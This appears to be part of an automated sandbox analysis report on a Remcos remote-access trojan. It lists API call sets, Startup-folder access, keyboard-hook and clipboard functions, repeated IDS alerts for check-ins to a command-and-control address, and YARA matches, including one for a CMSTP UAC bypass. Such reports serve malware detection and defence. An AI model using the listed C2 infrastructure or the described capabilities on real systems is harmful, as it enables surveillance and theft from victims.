                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E37EF
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E3B12
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EBCBC
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B42F
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418C69
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_0063445A
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063C6D1 FindFirstFileW,FindClose,1_2_0063C6D1
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0063C75C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0063EF95
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0063F0F2
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0063F3F3
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_006337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_006337EF
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00633B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00633B12
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0063BCBC
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49730 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49736 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49746 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49747 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49733 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49750 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49744 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49745 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49743 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49731 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49742 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49766 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49749 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49772 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49789 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49752 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49748 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49823 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49760 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49800 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49806 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49829 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49839 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49862 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49751 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49732 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49740 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49869 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49879 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49885 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49783 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49845 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49813 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49895 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49902 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49909 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49925 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49947 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49931 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49918 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49953 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49940 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49973 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49991 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49997 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49986 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49968 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49855 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50019 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50025 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49961 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49978 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50045 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50032 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50067 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50052 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50065 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50064 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50077 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50063 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50078 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50072 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50003 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50061 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50084 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50083 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50070 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50075 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50060 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50038 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50086 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50071 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50087 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50088 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50089 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50062 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50079 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50068 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50073 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50080 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50012 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50082 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50081 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50066 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50069 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50074 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50076 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50085 -> 192.210.150.26:8787
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 192.210.150.26
                Source: Joe Sandbox ViewIP Address: 192.210.150.26 192.210.150.26
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008F22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_008F22EE
                Source: Allene.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: Allene.exe, 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Allene.exe, 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Allene.exe, 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Allene.exe, 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000001_2_004099E4
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_008F4164
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_008F4164
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004159C6
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00644164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00644164
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008F3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_008F3F66
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_008E001C
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0090CABC
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0065CABC
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157121061.0000000003DDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0041BB71 SystemParametersInfoW,1_2_0041BB71
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0041BB77 SystemParametersInfoW,1_2_0041BB77

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
